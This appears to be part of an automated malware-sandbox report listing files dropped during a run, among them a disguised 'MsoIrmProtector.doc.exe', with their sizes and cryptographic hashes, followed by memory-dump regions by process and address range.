                                                      MD5

                                                      e4e584a4e2ea196f68dc529c7519cb1f

                                                      SHA1

                                                      262e349ef913b3ee9ac6ec577020376a4d32d348

                                                      SHA256

                                                      83a0c30e5594838c4097e0fa0adbd893d843c7c5c1f41b8707c23b56fa4d6e78

                                                      SHA512

                                                      53eeb734b84be011b33c742e672c72bac9a486b37e389969cb35deea51da40954607855d9dc942db69461d951ada3c48fb188b0cf874cb3db191f267fcd4e60a

                                                      Download Submit
                                                    • C:\Windows\System32\DriverStore\FileRepository\sdfrd.inf_amd64_23ad6a919c6adb23\SDFRd.sys
                                                      Filesize

                                                      1KB

                                                      MD5

                                                      9cb772143bf140451aeb209ce27a84f0

                                                      SHA1

                                                      b1b73f0bb922c295b6a5d26bba91d50bc1839844

                                                      SHA256

                                                      6fb2882df775b33326e888aa8c626c6daca68113f597218beacf026863064930

                                                      SHA512

                                                      d68d7feb2f8b75ba2ca30196e11470d29ed82eb209ee57f560325945b029f7ac9ebb22eb26cf66b7b2b7bc90d5dde591ca4836dc378d590a38bc0097ec6b307f

                                                      Download Submit
                                                    • C:\Windows\System32\DriverStore\FileRepository\storufs.inf_amd64_fe6eaa94381d8601\storufs.sys
                                                      Filesize

                                                      211B

                                                      MD5

                                                      1844c0ee01d12bec1976ffe8849ea72b

                                                      SHA1

                                                      84fd57ac49cc05236c54f762c31fdd2d90ad83c8

                                                      SHA256

                                                      776b323b23d79c21df2158ac5b147b826157b00a4ac827d4cb27f110285c5c6c

                                                      SHA512

                                                      2927a9448b4727eda672fab5bc58dac28fb88e7ce673ce48ceeeac9585426c4dcc23bf511410e97170dd55c067db50dc563cbaa3c79cfcb3c3bccd5d5063c09b

                                                      Download Submit
                                                    • C:\Windows\System32\DriverStore\FileRepository\ufxsynopsys.inf_amd64_9889401ff950bb0b\ufxsynopsys.sys
                                                      Filesize

                                                      643B

                                                      MD5

                                                      cb3ef1c2c175169c62e76725d546ab74

                                                      SHA1

                                                      6a5a29e6d0cc43af6a5171926b99d7e349f72d9b

                                                      SHA256

                                                      25312e52e6226200b341455dc4c40c5f991065ed81ae15cb5366a4065ed2984b

                                                      SHA512

                                                      06cfa63febacbf5fa1d342300594b44b4d3eb66861bb859532d48bf6f29b05431d8c499d9e671b58f26ae613e109bb886a8dfd97ba9d193e13c31b0a773741ee

                                                      Download Submit
                                                    • C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_585900615f764770\usbohci.sys
                                                      Filesize

                                                      230B

                                                      MD5

                                                      5048be4a51f6132e11d976923f7d4935

                                                      SHA1

                                                      f7194535d79a431abfaa602101d8b480e14aa0d2

                                                      SHA256

                                                      4eae0a007915e3c13e9c580e2996ebe19a5158bbd73759bf456705cf326b175b

                                                      SHA512

                                                      718731495bdabd575e914504800a9fd3c31435b27995f2b6a020ccd98f1ff631dcdf5a444e7db253e1e7ce280880e94ffdd4a703a964838158a13809344bd966

                                                      Download Submit
                                                    • C:\Windows\System32\DriverStore\FileRepository\vsmraid.inf_amd64_3d2bbc45931b8232\vsmraid.sys
                                                      Filesize

                                                      232B

                                                      MD5

                                                      c5f84e36d7ea11f5f6b7a8dbd6eed9fd

                                                      SHA1

                                                      88d884c8bc4603ddeee82d3942bb5adc76ae9d71

                                                      SHA256

                                                      45ebc086c2ad3b443e6ba8b261b8156f2f72a89022cb6acc637776522479f321

                                                      SHA512

                                                      fc2270f8b599f602351760d8105663fd06a3b2a83b155329566cd80a192d14730750f141666ddeac26fc5c1ca6a1398cfeb89f484b713415e9da5d695a11828c

                                                      Download Submit
                                                    • C:\Windows\System32\DriverStore\FileRepository\wsdscdrv.inf_amd64_24f24fc38e3e582d\WSDScDrv.dll
                                                      Filesize

                                                      393B

                                                      MD5

                                                      caecc81af12dc3bdebabf7540a887e30

                                                      SHA1

                                                      3f7c9e5f22c3dc682de1419cfbe861ad3952ead0

                                                      SHA256

                                                      2f04345cca0286903d40d22a4017d9dae3c9ef26930d5cc4342791c36dc9b208

                                                      SHA512

                                                      f7d124396f7e9f872661c485765e8b5c88d8cab6a6e73d8169b43f5d55f25fff5b75c9fe17e4639c89ca1c74087fea44c279567c00da4e7a2e4900cd46713537

                                                      Download Submit
                                                    • C:\Windows\System32\DriverStore\FileRepository\ykinx64.inf_amd64_0bbd8466b526ef26\ykinx64.sys
                                                      Filesize

                                                      535B

                                                      MD5

                                                      101ca6e14421f236f54ddc890404b3df

                                                      SHA1

                                                      98f7c5b3f0a89af0d7888f612a7974cc1532dc6d

                                                      SHA256

                                                      3e5b61c1b88d1f1357d1b9a5770aa54f217b9aa47522742987691eaefcd932cb

                                                      SHA512

                                                      ed9ef889735c4520591cf2b0ecc169c38765eec993291f6641c57a7aa2f0c237ab725f776dec251bd4cd5778a5faee4545a0f96489ecb24884c7539d56c6165c

                                                      Download Submit
                                                    • C:\Windows\mydoc.rtf
                                                      Filesize

                                                      223B

                                                      MD5

                                                      06604e5941c126e2e7be02c5cd9f62ec

                                                      SHA1

                                                      4eb9fdf8ff4e1e539236002bd363b82c8f8930e1

                                                      SHA256

                                                      85f2405d1f67021a3206faa26f6887932fea71aea070df3efb2902902e2d03e2

                                                      SHA512

                                                      803f5f2fddbf29fef34de184eb35c2311b7a694740983ca10b54ef252dd26cda4987458d2569f441c6dedc3478bea12b45bfd3566f1b256504a0869ad3829df7

                                                      Download Submit
                                                    • \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe
                                                      Filesize

                                                      512KB

                                                      MD5

                                                      cc7381405a4537de4ae21339d88824eb

                                                      SHA1

                                                      f5c2b09b7a37c8cd75fdbaad13be8ab5503a1cd4

                                                      SHA256

                                                      5e7171fd07b9b81b6531524014a62f526cca76c018194586e21be1c9afa80d87

                                                      SHA512

                                                      c6415cbce2829b445b40491bf78e5929df13ed6745529ca21603b7c7087897d0fa10e7d554df64fb8f7db68fa7b605f40e5a7c765d0be4acc00977a11d04ed21

                                                      Download Submit
                                                    • \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe
                                                      Filesize

                                                      512KB

                                                      MD5

                                                      87e3c8ef305d3c495c4cd5f15303244a

                                                      SHA1

                                                      750545c6c140cdb30ce096ea077ae31c2a70c1e3

                                                      SHA256

                                                      b7863bb1e6263c81ead4bafd3e87f4c4867e73bba6bafea3c16597dc76498b1d

                                                      SHA512

                                                      a1a39f57d4e233552ed67302a6ddbf0f98a48237b2e1dd30dd105c6317bdae26ec42fa49f44ae00244e7e6519a2390c537b718ca017d57d56934c7c79b5bdadb

                                                      Download Submit
                                                    • \??\pipe\LOCAL\crashpad_3108_WBXAVXYOZONUWKAA
                                                      MD5

                                                      d41d8cd98f00b204e9800998ecf8427e

                                                      SHA1

                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                      SHA256

                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                      SHA512

                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                      Download Submit
                                                    • memory/236-3157-0x00000000743CE000-0x00000000743CF000-memory.dmp
                                                      Filesize

                                                      4KB

                                                      Download
                                                    • memory/236-0-0x00000000743CE000-0x00000000743CF000-memory.dmp
                                                      Filesize

                                                      4KB

                                                      Download
                                                    • memory/236-4962-0x00000000743C0000-0x0000000074B71000-memory.dmp
                                                      Filesize

                                                      7.7MB

                                                      Download
                                                    • memory/236-4-0x0000000006260000-0x0000000006806000-memory.dmp
                                                      Filesize

                                                      5.6MB

                                                      Download
                                                    • memory/236-3-0x00000000743C0000-0x0000000074B71000-memory.dmp
                                                      Filesize

                                                      7.7MB

                                                      Download
                                                    • memory/236-2-0x00000000034C0000-0x00000000034E4000-memory.dmp
                                                      Filesize

                                                      144KB

                                                      Download
                                                    • memory/236-1-0x0000000000FD0000-0x000000000105C000-memory.dmp
                                                      Filesize

                                                      560KB

                                                      Download
                                                    • memory/236-3170-0x00000000743C0000-0x0000000074B71000-memory.dmp
                                                      Filesize

                                                      7.7MB

                                                      Download
                                                    • memory/1360-103-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-101-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-3748-0x0000000000C80000-0x0000000000D2A000-memory.dmp
                                                      Filesize

                                                      680KB

                                                      Download
                                                    • memory/1360-7445-0x00000000070B0000-0x00000000070B8000-memory.dmp
                                                      Filesize

                                                      32KB

                                                      Download
                                                    • memory/1360-7278-0x0000000006FC0000-0x0000000006FCC000-memory.dmp
                                                      Filesize

                                                      48KB

                                                      Download
                                                    • memory/1360-39-0x00000000060D0000-0x0000000006620000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-43-0x0000000005B80000-0x00000000060CE000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-3036-0x000000000B8C0000-0x000000000BFA0000-memory.dmp
                                                      Filesize

                                                      6.9MB

                                                      Download
                                                    • memory/1360-3029-0x0000000005B40000-0x0000000005B4A000-memory.dmp
                                                      Filesize

                                                      40KB

                                                      Download
                                                    • memory/1360-3024-0x0000000005A40000-0x0000000005AD2000-memory.dmp
                                                      Filesize

                                                      584KB

                                                      Download
                                                    • memory/1360-50-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-49-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-111-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-113-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-64-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-66-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-72-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-8380-0x0000000007320000-0x0000000007328000-memory.dmp
                                                      Filesize

                                                      32KB

                                                      Download
                                                    • memory/1360-105-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-107-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-76-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-80-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-78-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-86-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-92-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-90-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-99-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-56-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-109-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-95-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-97-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-88-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-82-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-84-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-74-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-70-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-68-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-62-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-52-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-54-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-58-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/1360-60-0x0000000005B80000-0x00000000060C9000-memory.dmp
                                                      Filesize

                                                      5.3MB

                                                      Download
                                                    • memory/3568-30-0x00007FF829790000-0x00007FF82A131000-memory.dmp
                                                      Filesize

                                                      9.6MB

                                                      Download
                                                    • memory/3568-4945-0x00007FF829790000-0x00007FF82A131000-memory.dmp
                                                      Filesize

                                                      9.6MB

                                                      Download
                                                    • memory/3568-3181-0x00007FF829790000-0x00007FF82A131000-memory.dmp
                                                      Filesize

                                                      9.6MB

                                                      Download
                                                    • memory/3568-26-0x00007FF829A45000-0x00007FF829A46000-memory.dmp
                                                      Filesize

                                                      4KB

                                                      Download
                                                    • memory/3568-27-0x00007FF829790000-0x00007FF82A131000-memory.dmp
                                                      Filesize

                                                      9.6MB

                                                      Download
                                                    • memory/5048-4970-0x0000000005160000-0x000000000519C000-memory.dmp
                                                      Filesize

                                                      240KB

                                                      Download
                                                    • memory/5048-4969-0x0000000005100000-0x0000000005112000-memory.dmp
                                                      Filesize

                                                      72KB

                                                      Download
                                                    • memory/5048-4961-0x0000000000060000-0x0000000000072000-memory.dmp
                                                      Filesize

                                                      72KB

                                                      Download
                                                    • memory/5368-3080-0x000001C757EC0000-0x000001C757EE2000-memory.dmp
                                                      Filesize

                                                      136KB

                                                      Download
                                                    • memory/5604-2375-0x0000000000BA0000-0x0000000000EC4000-memory.dmp
                                                      Filesize

                                                      3.1MB

                                                      Download
                                                    • memory/5700-3038-0x000000001CD10000-0x000000001CDC2000-memory.dmp
                                                      Filesize

                                                      712KB

                                                      Download
                                                    • memory/5700-3037-0x000000001CC00000-0x000000001CC50000-memory.dmp
                                                      Filesize

                                                      320KB

                                                      Download
                                                    • memory/5700-11810-0x000000001D650000-0x000000001DB78000-memory.dmp
                                                      Filesize

                                                      5.2MB

                                                      Download